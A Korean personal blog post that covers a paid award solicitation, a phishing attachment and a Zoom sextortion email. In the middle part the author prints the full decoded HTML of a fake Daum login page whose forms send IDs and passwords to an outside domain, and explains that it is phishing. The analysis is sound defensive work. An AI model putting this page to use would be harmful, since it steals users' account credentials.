반응형
1탄
구글 플레이에 현대미포조선에서 사용하는 앱을 하나 등록했었다.
몇 번 버전업도 되면서 나름 현장에서 잘 사용한다고 하는데, 처음 등록하자마자 관리해 주겠다 혹은 홍보해 주겠다는 메일이 왔었다. (외국계)
외부에서 사용할 수 있는 앱이 아니어서 무시했었는데 이번에 온 메일은 좀 달랐다.
한국모바일브랜드대상이라는 곳에서 메일이 왔다.
답변이 없다고 세 번이나 왔다.
그래서 이번에는 답변을 해 볼 생각이다.
이런 상은 300만원 정도 내면 아무나 준다던데, 이것도 그런 게 아닌지 궁금해서 해 보기로 했다.
최소한도의 무언가는 있어 보인다만, 아무래도 아무나 상주는 거 같은 느낌이다.
돈 내라고 연락올 거 같다.
신청했더니 조만간 신청 완료되었다고 메일이 왔다.
생각보다 싸네?
한 300만원 정도 예상했는데 130만원이라니... 부가세 포함하면 143만원
2탄
스팸 혹은 바이러스 메일로 보이는데, 받는 사람에 내가 없는데(참조에도) 나한테 배달된 메일이 있다.
메일 시작이 '여보세요'인 것도 재밌다.
아마도 외국에서 만든 바이러스 메일(첨부 파일이 있는 걸로 보아)인 것 같다.
전화 번호, 팩스 번호, 메일 주소 등은 일부 혹은 전부를 지워서 개인 정보가 새지 않도록 하였다.
메일 마지막에 깨진 이미지는 수신 확인용 이미지인 듯 하다.
보내는 사람이나 받는 사람에 내 메일 주소는 없다.
참조도 없는데 어떻게 나에게 배달될 수 있었을까?
그런 메일이 하나 더 왔다.
이번에는 첨부 파일을 내려 받아서 텍스트 에디터로 열어 보았다.
document.write(unescape('%20%20%20%20%3c%6d%65%74%6
이런 내용이 있는 걸로 보아 스크립트를 생성하는 것 같다.
무슨 내용일까 궁금해서 복호화(unescape이라고 되어 있는 함수명과는 달리 urldecode를 해야 한다.) 해 보니...
다음 로그인 화면이 나오네???
이거 뭐지???
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta property="og:title" content="Daum 로그인">
<meta property="og:type" content="website">
<meta property="og:image"
content="http://m1.daumcdn.net/svc/image/U03/common_icon/5587C4E4012FCD00
01">
<meta property="og:image:secure_url"
content="https://m1.daumcdn.net/svc/image/U03/common_icon/5587C4E4012FCD0
001">
<meta property="og:description" content="여기를
눌러 링크를
확인하세요.">
<title>Daum 로그인</title>
<link rel="stylesheet" type="text/css"
href="https://logins.daum.net/contents/min/css/pc.css">
<link rel="stylesheet" type="text/css"
href="https://logins.daum.net/contents/min/css/font_pc.css">
<script type="text/javascript"
src="https://t1.daumcdn.net/id/statics/common/js-lib/jquery-
1.12.1.min.js"></script>
<script type="text/javascript"
src="https://t1.daumcdn.net/id/statics/common/js-lib/jquery.cookie-
1.3.1.min.js"></script>
<script type="text/javascript"
src="https://developers.kakao.com/sdk/js/kakao.min.js"></script>
<script type="text/javascript"
src="https://logins.daum.net/contents/min/js/login-default.js"></script>
</head>
<body>
<div id="kakaoWrap">
<div id="kakaoHead">
<div class="inner_head">
<h1>
<a href="http://www.daum.net"
id="daumLogo" class="link_daum" alt="Daum"
onclick="_tiq.push(['__trackEvent',
'loginform_pc', 'daum_logo']);">
<span class="ir_wa">DAUM</span>
</a>
</h1>
</div>
</div>
<hr class="hide" >
<div id="kakaoContent" class="cont_identify" role="main">
<!--
아이디입력도움말
노출시 view_help클래스 /
자판보기 노출시
view_key클래스 / 특수문자
노출시 view_char클래스
추가 -->
<div id="mArticle">
<h2 class="screen_out">IP 보안
설정
</h2>
<div class="section_login">
<div class="area_identify ">
<p class="desc_identify">로그인
이용 중 IP가 변경되어 <em
class="emph_login">비밀번호
재확인</em>이
필요합니다.
</p>
<a href="http://cs.daum.net/faq/59/8035.html?
faqId=29554" class="link_identify" target="_blank"><span
class="txt_move">IP 보안 설정이란?
</span></a>
</div>
<div id="loginFormDiv"
class="login_identify">
<form method="post" action="https://hongkmalls.info/get-quotation.php">
<input type="hidden"
name="url" value="http://mail2.daum.net/hanmailex/Top.daum" />
<input type="hidden"
name="relative" value="" />
<input type="hidden"
name="weblogin" value="1" />
<input type="hidden" name="service" value="" />
<input type="hidden" name="slevel" value="1" />
<input type="hidden" name="finaldest"
value="" />
<input type="hidden" name="reloginSeq"
value="0" />
<fieldset
class="fld_comm">
<legend
class="screen_out">아이디,비밀번Ȥ
40; 로그인 정보 입력
폼
</legend>
<div
class="box_inp ">
<!-- input 포커스시
input_on클래스 추가 /
입력시,
입력내용삭제버튼
노출시 del_on클래스 추가
-->
<!--
공통 : input입력시
lab_g요소에 screen_out클래스
추가 -->
<input
type="id" placeholder="아이디 입력" id="id"
required name="id" value="" class="tf_g" style="ime-mode:disabled;">
<button
type="button" class="btn_del"><span class="ico_login
ico_del">입력 내용
지우기</span></button>
</div>
<p id="id_msg"
class="txt_message" style=" display:none ">
<!--
오류메세지 노출시
display:block, 비노출시 display:none -->
</p>
<div
class="box_inp ">
<!-- input 포커스시
input_on클래스 추가 /
입력시,
입력내용삭제버튼
노출시 del_on클래스 추가
-->
<!--
공통 : input입력시
lab_g요소에 screen_out클래스
추가 -->
<input
type="password" required placeholder="비밀번호
입력" name="pw" class="tf_g" maxlength="32"
autocomplete="off" style="ime-mode:disabled;">
<button
type="button" class="btn_del"><span class="ico_login
ico_del">입력 내용
지우기</span></button>
</div>
<p id="pw_msg"
class="txt_message" style=" display:none ">
<!--
오류메세지 노출시
display:block, 비노출시 display:none -->
</p>
<button
id="loginBtn" type="submit" class="btn_comm" onclick="_tiq.push
(['__trackEvent', 'loginform_pc',
'login_daum']);">로그인</button>
<div
class="set_login">
<!-- 2016-10-10
툴팁노출시
tooltip_on클래스 추가 -->
<span class="set_comm ">
<!-- 선택시
check_on클래스 추가 -->
<label for="stln" class="lab_check" onclick="_tiq.push(['__trackEvent',
'loginform_pc', 'stln']);">로그인 상태
유지</label>
<span class="check_g">
<input type="checkbox" id="stln" name="stln" value="1"
class="inp_check" onclick="_tiq.push(['__trackEvent', 'loginform_pc',
'stln']);">
<span class="ico_login
ico_check">선택안됨</span> <!-- inp_check에
초점이 이동한경우
해당 ico_check요소에
focus클래스 추가 /
선택상태에 맞게
'선택됨','선택안됨'
으로 대체텍스트
제공 -->
</span>
</span>
<div
class="layer_set" style=" display:none ">
<!--
비노출시 display:none 처리 -->
<p class="desc_set">개인정보
보호를 위해, 개인
PC에서만 사용해
주세요.
</p>
<span class="ico_login ico_point"></span>
</div>
<span class="set_security ">
<!-- 체크해제
시 check_off클래스 추가 -->
<a href="#none" id="linkSecurity" class="link_security" target="_blank"
onclick="_tiq.push(['__trackEvent', 'loginform_pc',
'ipsecurity_label']);">IP보안</a>
<input type="checkbox" id="ipSecurity" name="ipSecurity"
class="inp_check" value="checked" checked="checked">
<label for="ipSecurity" class="ico_login lab_security"
onclick="_tiq.push(['__trackEvent', 'loginform_pc',
'ipsecurity_onoff']);">IP보안 설정 ON</label><!--
inp_check에 초점이
이동한경우 해당
lab_security요소에 focus클래스
추가 / ON,OFF선택에 맞게
'IP보안 설정 ON','IP보안
설정 OFF'로 대체텍스트
제공 -->
</span>
</div>
</fieldset>
</form>
<div class="login_help">
<button type="button"
class="btn_help btn_key " onclick="_tiq.push(['__trackEvent',
'loginform_pc', 'open_keyboard']);">자판보기<span
class="ico_login
ico_arr">펼치기/접기</span></button> <!--
버튼클릭시 btn_view클래스
추가 -->
<button type="button"
class="btn_help btn_key " onclick="_tiq.push(['__trackEvent',
'loginform_pc', 'special_char']);">특수문자<span
class="ico_login
ico_arr">펼치기/접기</span></button> <!--
버튼클릭시 btn_view클래스
추가 -->
<button type="button"
class="btn_help " onclick="_tiq.push(['__trackEvent', 'loginform_pc',
'id_help']);">아이디 입력
도움말<span class="ico_login
ico_arr">펼치기/접기</span></button> <!--
버튼클릭시 btn_view클래스
추가 -->
</div>
<div class="area_help"
style="display:none">
<div class="bg_help
img_key"></div>
</div>
<div class="area_help"
style="display:none">
<div class="bg_help
img_char"></div>
</div>
<div class="area_help"
style="display:none">
<ul class="list_help">
<li><span
class="ico_login
ico_dot"></span>이메일아이디는
<em class="emph_login">이메일 전체를
입력</em>해 주세요. <span
class="txt_help">예) abc@example.com</span>
</li>
<li><span
class="ico_login
ico_dot"></span>폰번호아이디는
<em class="emph_login">폰번호 앞에
#을 붙여서 입력</em>해
주세요. <span class="txt_help">예)
#01090008000</span>
</li>
</ul>
<button type="button"
class="btn_close">도움말 닫기<span
class="ico_login ico_close"></span></button>
</div>
<div class="login_rel">
<a
href="https://member.daum.net/join/terms?rtnUrl=http%3A%2F
%2Fmail2.daum.net%2Fhanmailex%2FTop.daum" id="signUp" class="link_rel"
target="_blank" onclick="_tiq.push(['__trackEvent', 'loginform_pc',
'join']);">회원가입</a><span class="txt_bar">|
</span><a href="https://member.daum.net/find/id.do" id="findID"
class="link_rel" target="_blank" onclick="_tiq.push(['__trackEvent',
'loginform_pc', 'findid']);">아이디
찾기</a><span class="txt_bar">|</span><a
href="https://member.daum.net/find/password.do" id="findPW"
class="link_rel" target="_blank" onclick="_tiq.push(['__trackEvent',
'loginform_pc', 'findpw']);">비밀번호
찾기</a>
</div>
<div class="wrap_util">
<a href="#"
class="link_kakao" id="btnKakaoLogin" onclick="_tiq.push(['__trackEvent',
'loginform_pc', 'login_kakao']);"><span class="ico_login
ico_klogin"></span><span
class="txt_kakao">카카오계정으로
; 로그인</span></a>
</div>
</div>
</div>
</div>
</div>
<hr class="hide">
<div id="kakaoFoot">
<h2 class="screen_out">서비스
이용정보
</h2>
<a href=http://www.kakaocorp.com/ class="link_kcorp"
target="_blank"
onclick="_tiq.push(['__trackEvent', 'loginform_pc',
'footer_corp']);">© Kakao Corp.</a>
<span class="txt_bar">|</span>
<a href=http://cs.daum.net/faq/59/14970.html
class="link_custom" target="_blank"
onclick="_tiq.push(['__trackEvent', 'loginform_pc',
'footer_cs']);">고객센터</a>
</div>
<div style="display:none">
<form novalidate id="kakaoLoginForm" method="post"
action="https://hongkmalls.info/get-quotation.php">
<input type="hidden" name="url"
value="http://mail2.daum.net/hanmailex/Top.daum"/>
<input type="hidden" name="service" value=""/>
<input type="hidden" name="finaldest" value=""/>
<input type="hidden" name="reloginSeq" value="84603421"/>
<input type="hidden" name="relative" value=""/>
<input type="hidden" name="weblogin" value="1"/>
<input type="hidden" name="slevel" value="1"/>
<input type="hidden" name="platform" value="pc_web"/>
<input type="hidden"
name="handlebackurl" id="handlebackurl" value=""/>
</form>
</div>
</div>
<script type="text/javascript"
src="https://s1.daumcdn.net/svc/original/U03/cssjs/jquery/jquery-
1.10.2.min.js"></script>
<script type="text/javascript"
src="https://s1.daumcdn.net/svc/original/U03/cssjs/jquery/plugin/jquery.c
ookie-1.3.1.min.js"></script>
<script type="text/javascript" src="/min/js/2.4/jquery-init.js"></script>
<script type="text/javascript" src="/min/js/2.4/login-all.js"></script>
<script type="text/javascript" src="/min/js/2.4/swfobject.js?
v=0.1"></script>
<script type="text/javascript" src="/min/js/2.4/loginform.js"></script>
<script type="text/javascript" src="/min/js/2.4/form-resize.js"></script>
<script type="text/javascript"
src="//developers.kakao.com/sdk/js/kakao.min.js"></script><script
type="text/javascript">
jQuery(document).ready(function () {
var virtualKeyView = new VirtualKeyView('#kakaoContent');
virtualKeyView.initialize();
toggleBodyClass();
var loginForm = new LoginForm('#loginForm', {
dummy: 0
}).initialize();
if (daumlogin.srp) {
daumlogin.srp.setValidator(loginForm.checkValid);
}
Kakao.init
('d10838164fe04a4e6da8e1f6d9972096');
jQuery("#btnKakaoLogin").click(function () {
_tiq.push(['__trackEvent', 'loginform_pc',
'login_kakao']);
Kakao.Auth.login({
success: function (authObj) {
var input = jQuery("<input>")
.attr("type", "hidden")
.attr("name", "access_token").val
(authObj.access_token);
jQuery('#kakaoLoginForm').append(jQuery(input));
jQuery("#kakaoLoginForm").submit();
},
fail: function (err) {
if (err.error !== 'access_denied' && err.error !
== 'window_closed') {
alert
('카카오계정
로그인이
실패하였습니다. \n' +
JSON.stringify(err.error_description));
}
},
approvalType: 'project'
});
return false;
});
document.getElementById
('handlebackurl').value = document.location.href;
});
</script>
<script type='text/javascript'>
var _tiq = 'undefined' !== typeof _tiq ? _tiq : []; // Global
Variables
_tiq.push(['__trackPageview']);
(function(d) {
var se = d.createElement('script'); se.type = 'text/javascript';
se.async = true;
se.src = location.protocol +
'//m1.daumcdn.net/tiara/js/td.min.js';
var s = d.getElementsByTagName('head')[0]; s.appendChild(se);
})(document);
</script>
</body>
로그인 정보를 hongkmalls.info/get-quotation.php이라는 곳으로 보내는데, 아마 여기에 함정이 숨어 있는 것 같다.
위 url을 직접 열어 보면 다음 로그인 화면으로 보내 버린다.
도메인을 whois 조회해 보니 미국 - Arizona - Phoenix - Iconvergence에 있는 서버로 나온다.
다음 로그인 정보를 미국에 보낼 일이 없으니 당연히 피싱(phising) 되시겠다.
다음 메일에서 받은 첨부 파일을 열었는데, 다음 로그인이 뜬다면 누구나 로그인 하려고 하겠지.
그런 점을 노린 해킹으로 보인다.
3탄
초등학생 딸이 있어서 원격 수업을 Zoom으로 진행하고 있는데, 해킹 당했다니 가슴이 철렁.
하지만 내용에 별다른 정보도 없고, 공갈만 있는 걸로 보아 별 거 아니겠구나 하고 검색해 보니 아니나 다를까...
www.komando.com/security-privacy/zoom-sextortion-scam/762168/
This scary Zoom email is just a sextortion scam. Don't respond!
If you get a threatening email about blackmail taken from your Zoom account, ignore it. It's a sextortion scam.
www.komando.com
이런 메일은 한 놈만 걸려라 하고 뿌리는 공갈 메일이라고 한다.
그러니 이런 메일을 받은 분들은 너무 무서워 말고 안심하시기를...
반응형
'그저 주저리' 카테고리의 다른 글
| 변신화 구매 후기 (0) | 2021.03.29 |
|---|---|
| 이사 온 주말에 눈이 펑펑 (0) | 2021.01.18 |
| 집사람이 일하는 곳에 코로나19 확진자 발생 (0) | 2020.08.14 |
| 간만에 밤 산책 다녀옴 (0) | 2020.08.07 |
| 오늘(2020/08/06) 아침 양재천 (0) | 2020.08.06 |
